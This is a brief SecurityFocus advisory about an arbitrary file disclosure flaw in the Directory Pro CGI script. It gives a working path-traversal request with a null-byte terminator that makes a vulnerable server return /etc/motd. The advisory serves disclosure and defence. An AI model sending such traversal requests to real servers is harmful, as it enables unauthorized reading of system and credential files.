Directory Pro Arbitrary File Disclosure Vulnerability

Submit a request such as this to a vulnerable webserver:

http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00

This will result in the contents of '/etc/motd' being output.


 

Privacy Statement
Copyright 2010, SecurityFocus